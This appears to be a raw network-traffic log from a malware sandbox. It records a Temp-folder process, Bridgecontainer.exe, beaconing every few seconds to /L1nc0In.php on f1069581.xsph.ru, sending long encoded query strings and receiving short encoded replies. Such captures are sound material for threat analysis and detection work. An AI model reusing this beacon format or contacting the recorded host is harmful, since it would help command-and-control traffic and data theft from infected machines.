Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49829	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:34.621783972 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:17:35.325664043 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49867	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:40.341936111 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:17:41.044749022 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49906	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:46.058950901 CET	2206	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJN [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:17:46.779894114 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49940	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:51.802097082 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:17:52.626235008 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49981	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:57.637072086 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:17:58.308748007 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49987	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:03.347429037 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:18:04.023752928 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49988	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:09.044888973 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:18:09.719713926 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49989	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:14.732865095 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:18:15.414184093 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49990	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:20.434029102 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html 